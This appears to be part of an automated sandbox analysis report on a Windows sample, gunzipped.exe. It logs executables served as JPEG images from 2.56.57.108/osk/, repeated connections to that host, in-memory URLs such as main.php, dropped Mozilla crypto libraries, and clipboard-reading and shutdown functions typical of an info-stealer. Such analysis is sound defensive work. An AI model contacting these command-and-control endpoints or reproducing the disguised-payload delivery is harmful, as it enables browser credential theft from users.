01 00 d0 1d 00 00 00 30 02 00 68 0c 00 00 00 b9 01 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 54 b9 01 00 18 00 00 00 68 b8 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 90 01 00 f4 02 00 00 6c be 01 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ca 78 01 00 00 10 00 00 00 7a 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 5e 65 00 00 00 90 01 00 00 66 00 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 bc 0b 00 00 00 00 02 00 00 02 00 00 00 e4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 00 00 38 00 00 00 00 10 02 00 00 02 00 00 00 e6 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 20 02 00 00 04 00 00 00 e8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 0c 00 00 00 30 02 00 00 0e 00 00 00 ec 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 06 Jan 2022 06:57:29 GMTServer: Apache/2.4.12 (Win32) OpenSSL/1.0.1m PHP/5.3.29 mod_wsgi/4.4.11 Python/2.7.10Last-Modified: Thu, 06 Jun 2019 04:01:30 GMTETag: "6b738-58a9fc4d0ba80"Accept-Ranges: bytesContent-Length: 440120Keep-Alive: timeout=5, max=96Connection: Keep-AliveContent-Type: image/jpegData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a6 c8 bc 41 e2 a9 d2 12 e2 a9 d2 12 e2 a9 d2 12 56 35 3d 12 e0 a9 d2 12 eb d1 41 12 fa a9 d2 12 3b cb d3 13 e1 a9 d2 12 e2 a9 d3 12 22 a9 d2 12 3b cb d1 13 eb a9 d2 12 3b cb d6 13 ee a9 d2 12 3b cb d7 13 f4 a9 d2 12 3b cb da 13 95 a9 d2 12 3b cb d2 13 e3 a9 d2 12 3b cb 2d 12 e3 a9 d2 12 3b cb d0 13 e3 a9 d2 12 52 69 63 68 e2 a9 d2 12 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 16 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 04 06 00 00 82 00 00 00 00 00 00 50 b1 03 00 00 10 00 00 00 20 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 d0 06 00 00 04 00 00 61 7a 07 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f0 43 04 00 82 cf 01 00 f4 52 06 00 2c 01 00 00 00 80 06 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 78 06 00 38 3f 00 00 00 90 06 00 34 3a 00 00 f0 66 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 28 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 50 06 00 f0 02 00 00 98 40 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 72 03 06 00 00 10 00 00 00 04 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 10 28 00 00 00 20 06 00 00 18 00 00 00 08 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 36 14 00 00 00 50 06 00 00 16 00 00 00 20 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 70 06 00 00 02 00 00 00 36 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 03 00 00 00 80 06 00 00 04 00 00 00 38 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 34 3a 00 00 00 90 06 00 00 3c 00 00 00 3c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 06 Jan 2022 06:57:30 GMTServer: Apache/2.4.12 (Win32) OpenSSL/1.0.1m PHP/5.3.29 mod_wsgi/4.4.11 Python/2.7.10Last-Modified: Thu, 06 Jun 2019 04:01:44 GMTETag: "1303d0-58a9fc5a65a00"Accept-Ranges: bytesContent-Length: 1246160Keep-Alive: timeout=5, max=95Connection: Keep-AliveContent-Type: image/jpegData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 23 83 34 8c 67 e2 5a df 67 e2 5a df 67 e2 5a df 6e 9a c9 df 73 e2 5a df be 80 5b de 65 e2 5a df f9 42 9d df 63 e2 5a df be 80 59 de 6a e2 5a df be 80 5f de 6d e2 5a df be 80 5e de 6c e2 5a df 45 82 5b de 6f e2 5a df ac 81 5b de 64 e2 5a df 67 e2 5b df 90 e2 5a df ac 81 5e de 6d e3 5a df ac 81 5a de 66 e2 5a df ac 81 a5 df 66 e2 5a df ac 81 58 de 66 e2 5a df 52 69 63 68 67 e2 5a df 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 ad 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 0e 00 00 1e 04 00 00 00 00 00 77 f0 0e 00 00 10 00 00 00 00 0f 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 40 13 00 00 04 00 00 b7 bb 13 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 9d 11 00 88 a0 00 00 88 3d 12 00 54 01 00 00 00 b0 12 00 70 03 00 00 00 00 00 00 00 00 00 00 00 e6 12 00 d0 1d 00 00 00 c0 12 00 14 7d 00 00 70 97 11 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 97 11 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 81 e8 0e 00 00 10 00 00 00 ea 0e 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 10 52 03 00 00 00 0f 00 00 54 03 00 00 ee 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 74 47 00 00 00 60 12 00 00 22 00 00 00 42 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 70 03 00 00 00 b0 12 00 00 04 00 00 00 64 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 14 7d 00 00 00 c0 12 00 00 7e 00 00 00 68 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 06 Jan 2022 06:57:31 GMTServer: Apache/2.4.12 (Win32) OpenSSL/1.0.1m PHP/5.3.29 mod_wsgi/4.4.11 Python/2.7.10Last-Modified: Thu, 06 Jun 2019 04:02:02 GMTETag: "14748-58a9fc6b90280"Accept-Ranges: bytesContent-Length: 83784Keep-Alive: timeout=5, max=94Connection: Keep-AliveContent-Type: image/jpegData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 01 f9 a3 4e 45 98 cd 1d 45 98 cd 1d 45 98 cd 1d f1 04 22 1d 47 98 cd 1d 4c e0 5e 1d 4e 98 cd 1d 45 98 cc 1d 6c 98 cd 1d 9c fa c9 1c 55 98 cd 1d 9c fa ce 1c 56 98 cd 1d 9c fa c8 1c 41 98 cd 1d 9c fa c5 1c 5f 98 cd 1d 9c fa cd 1c 44 98 cd 1d 9c fa 32 1d 44 98 cd 1d 9c fa cf 1c 44 98 cd 1d 52 69 63 68 45 98 cd 1d 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 0c 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 00 00 00 20 00 00 00 00 00 00 00 ae 00 00 00 10 00 00 00 00 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 40 01 00 00 04 00 00 bc 11 02 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 b0 f0 00 00 14 09 00 00 c0 10 01 00 8c 00 00 00 00 20 01 00 08 04 00 00 00 00 00 00 00 00 00 00 00 08 01 00 48 3f 00 00 00 30 01 00 94 0a 00 00 b0 1f 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 1f 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 e9 00 00 00 10 00 00 00 ea 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 44 06 00 00 00 00 01 00 00 02 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 b8 05 00 00 00 10 01 00 00 06 00 00 00 f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 08 04 00 00 00 20 01 00 00 06 00 00 00 f6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 0a 00 00 00 30 01 00 00 0c 00 00 00 fc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108

Source: gunzipped.exe, gunzipped.exe, 00000001.00000002.332350295.00000000007D7000.00000002.00000001.sdmp, gunzipped.exe, 00000001.00000000.307855730.00000000007B0000.00000040.00000001.sdmp, gunzipped.exe, 00000001.00000000.308868870.00000000007B0000.00000040.00000001.sdmp	String found in binary or memory: http://2.56.57.108/osk/
Source: gunzipped.exe, 00000001.00000002.332379792.000000000091C000.00000004.00000010.sdmp, gunzipped.exe, 00000001.00000002.332482820.0000000000C4A000.00000004.00000020.sdmp	String found in binary or memory: http://2.56.57.108/osk//1.jpg
Source: gunzipped.exe, 00000001.00000002.332379792.000000000091C000.00000004.00000010.sdmp	String found in binary or memory: http://2.56.57.108/osk//1.jpghttp://2.56.57.108/osk//4.jpghttp://2.56.57.108/osk//7.jpghttp://2.56.5
Source: gunzipped.exe, 00000001.00000002.332379792.000000000091C000.00000004.00000010.sdmp, gunzipped.exe, 00000001.00000002.332482820.0000000000C4A000.00000004.00000020.sdmp	String found in binary or memory: http://2.56.57.108/osk//2.jpg
Source: gunzipped.exe, 00000001.00000002.332379792.000000000091C000.00000004.00000010.sdmp	String found in binary or memory: http://2.56.57.108/osk//2.jpghttp://2.56.57.108/osk//6.jpghttp://2.56.57.108/osk//3.jpghttp://2.56.5
Source: gunzipped.exe, 00000001.00000002.332379792.000000000091C000.00000004.00000010.sdmp, gunzipped.exe, 00000001.00000002.332482820.0000000000C4A000.00000004.00000020.sdmp	String found in binary or memory: http://2.56.57.108/osk//3.jpg
Source: gunzipped.exe, 00000001.00000002.332379792.000000000091C000.00000004.00000010.sdmp, gunzipped.exe, 00000001.00000002.332482820.0000000000C4A000.00000004.00000020.sdmp	String found in binary or memory: http://2.56.57.108/osk//4.jpg
Source: gunzipped.exe, 00000001.00000002.332379792.000000000091C000.00000004.00000010.sdmp, gunzipped.exe, 00000001.00000002.332482820.0000000000C4A000.00000004.00000020.sdmp	String found in binary or memory: http://2.56.57.108/osk//5.jpg
Source: gunzipped.exe, 00000001.00000002.332482820.0000000000C4A000.00000004.00000020.sdmp	String found in binary or memory: http://2.56.57.108/osk//5.jpg2
Source: gunzipped.exe, 00000001.00000002.332379792.000000000091C000.00000004.00000010.sdmp	String found in binary or memory: http://2.56.57.108/osk//6.jpg
Source: gunzipped.exe, 00000001.00000002.332379792.000000000091C000.00000004.00000010.sdmp, gunzipped.exe, 00000001.00000002.332482820.0000000000C4A000.00000004.00000020.sdmp	String found in binary or memory: http://2.56.57.108/osk//7.jpg
Source: gunzipped.exe, 00000001.00000002.332482820.0000000000C4A000.00000004.00000020.sdmp	String found in binary or memory: http://2.56.57.108/osk//7.jpgB
Source: gunzipped.exe, 00000001.00000002.332379792.000000000091C000.00000004.00000010.sdmp	String found in binary or memory: http://2.56.57.108/osk//main.php
Source: gunzipped.exe, 00000001.00000003.317919411.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.317143663.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: gunzipped.exe, 00000001.00000003.317919411.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.317143663.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: gunzipped.exe, 00000001.00000003.317919411.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.317143663.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: gunzipped.exe, 00000001.00000003.317919411.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.317143663.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: gunzipped.exe, 00000001.00000003.317919411.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.317143663.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: gunzipped.exe, 00000001.00000003.317919411.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.317143663.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: gunzipped.exe, 00000001.00000003.317919411.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.317143663.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: gunzipped.exe	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: gunzipped.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: gunzipped.exe, 00000001.00000003.317919411.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.317143663.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: gunzipped.exe, 00000001.00000003.317919411.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.317143663.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: gunzipped.exe, 00000001.00000003.317919411.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.317143663.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr	String found in binary or memory: http://ocsp.thawte.com0
Source: gunzipped.exe, 00000001.00000003.317919411.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.317143663.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: gunzipped.exe, 00000001.00000003.317919411.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.317143663.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: gunzipped.exe, 00000001.00000003.317919411.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.317143663.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: mozglue.dll.1.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: gunzipped.exe, 00000001.00000003.317919411.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.317143663.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr	String found in binary or memory: http://www.mozilla.com0
Source: gunzipped.exe, 00000001.00000003.326516330.0000000000C97000.00000004.00000001.sdmp, temp.1.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: gunzipped.exe, 00000001.00000003.326516330.0000000000C97000.00000004.00000001.sdmp, temp.1.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: gunzipped.exe, 00000001.00000003.326516330.0000000000C97000.00000004.00000001.sdmp, temp.1.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: gunzipped.exe, 00000001.00000003.326516330.0000000000C97000.00000004.00000001.sdmp, temp.1.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: gunzipped.exe, 00000001.00000003.326516330.0000000000C97000.00000004.00000001.sdmp, temp.1.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: gunzipped.exe, 00000001.00000003.326516330.0000000000C97000.00000004.00000001.sdmp, temp.1.dr	String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: gunzipped.exe, 00000001.00000003.326516330.0000000000C97000.00000004.00000001.sdmp, temp.1.dr	String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: gunzipped.exe, 00000001.00000002.333464446.00000000031F0000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: gunzipped.exe, 00000001.00000002.333464446.00000000031F0000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/answer/6258784
Source: gunzipped.exe, 00000001.00000003.317919411.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.317143663.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: gunzipped.exe, 00000001.00000003.326516330.0000000000C97000.00000004.00000001.sdmp, temp.1.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: unknown

Source: C:\Users\user\Desktop\gunzipped.exe

Code function: 1_2_007D1CF0 InternetSetFilePointer,InternetReadFile,_memset,HttpQueryInfoA,_memcpy_s,_memcpy_s,

1_2_007D1CF0

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality for read data from the clipboard

Source: C:\Users\user\Desktop\gunzipped.exe

0_2_00404DEB

System Summary:

Uses 32bit PE files

Source: gunzipped.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Contains functionality to shutdown / reboot the system

